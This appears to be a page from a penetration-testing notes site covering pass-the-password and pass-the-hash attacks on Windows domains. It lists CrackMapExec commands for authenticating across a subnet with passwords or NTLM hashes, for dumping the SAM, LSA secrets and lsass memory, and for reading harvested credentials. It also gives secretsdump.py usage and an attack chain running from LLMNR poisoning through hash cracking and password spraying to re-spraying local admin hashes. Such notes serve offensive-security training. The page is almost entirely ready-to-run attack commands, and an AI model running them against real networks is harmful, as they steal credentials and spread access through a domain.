Pass Attacks

CrackMapExec

Commands

# SMB
crackmapexec smb IP_ADDRESS or SUBNET -u USER -d DOMAIN -p PASSWORD

# SMB using Hash (only NTLMv1)
crackmapexec smb IP_ADDRESS or SUBNET -u USER -H HASH --local-auth 

# Dump SAM - add this at the end of the command
--sam

# List shares on machines
--shares

# Dump LSA
--lsa

# Use lsassy to dump and parse lsass
-M lsassy

# Access CrackMapExec DB
cmedb

# Dumps all hosts in DB
hosts

# Dumps all creds in DB
creds

Secretsdump.py

Commands

# Using a password
secretsdump.py DOMAIN/USER:'PASSWORD'@IP_ADDRESS

# Using hashes 
secretsdump.py USER@IP_ADDRESS -hashes HASH

Attack path

llmnr -> hash -> crack hashes -> spray password -> look for new logins -> secretsdump with new logins -> local admin hashes -> respray network with local accounts

PreviousURL File Attack NextKerberoasting

Last updated 6 months ago